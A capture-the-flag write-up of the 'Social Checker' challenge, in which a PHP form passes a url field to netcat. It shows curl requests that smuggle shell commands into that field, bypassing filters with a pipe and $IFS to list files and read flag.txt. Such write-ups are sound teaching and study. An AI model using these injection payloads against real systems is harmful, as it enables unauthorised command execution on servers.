Social Checker


Social Checker - check if your favourite social media site is online!


After visiting the challenge URL I was presented with a pulldown list of Social Media services and a Check It! button, which appeared to conduct a port check and return the results:

I viewed the HTML source to determine what the action the submit button was making and found that a PHP script was called and passed a url form field:

function doCheck() {
  $.post("check.php", {"url": $("#url").val()}, function(data) {

My next step was to recreate the same form POST with curl to make it easier to manipulate the form data:

$ curl -X POST -d '' '' ( open

I submitted junk data for the url value as an attempt to invoke an error condition, which revealed that netcat was being called by the PHP script:

$ curl -X POST -d 'url=junk' ''

nc: bad address 'junk'

I spent some time testing various methods for including additional parameters and shell commands to cause a remote command execution and found some humorous messages when specify characters weren't allowed. For example, including a semi-colon produces a YouTube link to a montage of Consuela from Family Guy saying, "No", and using whitespace results in a YouTube link to the song Out Of Space by The Prodigy.

$ curl -X POST '' -d 'url=localhost;ls'

nice try -

I was able to work past the character restrictions using a pipe (|) instead of a semi-colon and the Internal Field Separator shell variable ($IFS) in-place of a space:

$ curl -X POST '' -d 'url=localhost|ls$IFS.'

ls: 80: No such file or directory

After a bit more testing I was able to create a payload to dump the flag file:

$ curl -X POST '' -d 'url=localhost|cat$IFS./flag.txt'

he2021{1ts_fun_t0_1nj3kt_k0mmand5}cat: can't open '80': No such file or directory



Leave a comment